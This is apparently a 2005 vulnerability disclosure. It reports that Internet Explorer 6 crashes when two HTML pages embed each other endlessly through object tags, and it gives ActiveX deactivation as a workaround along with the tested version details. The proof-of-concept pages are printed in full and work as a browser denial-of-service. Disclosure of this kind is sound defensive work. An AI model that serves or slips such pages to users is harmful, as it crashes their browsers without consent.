Microsoft Internet Explorer - Crash on processing embedded files with endless loop (05/28/2005) Description: There is a bug in Microsoft Internet Explorer, which causes a crash in it. The bug occurs, because Microsoft Internet Explorer doesn't limit the depth of embedded files. Affected software: Microsoft Internet Explorer Workaround: Deactivate "ActiveX" in the IE options menu. Proof-of-Concept exploit: Page #1 (save as "btf1.htm"): <html><head><title>BTF - MSIE crash</title></head><body> <object data="./btf2.htm" width="0" height="0"></object> </body></html> Page #2 (save as "btf2.htm"): <html><head><title>BTF - MSIE crash</title></head><body> <object data="./btf1.htm" width="0" height="0"></object> </body></html> Date of discovery: 26. September 2003 Tested software: Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519) on a fully patched Windows XP SP2 system. DLL versions: MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648) Regards, Benjamin Tobias Franz Germany
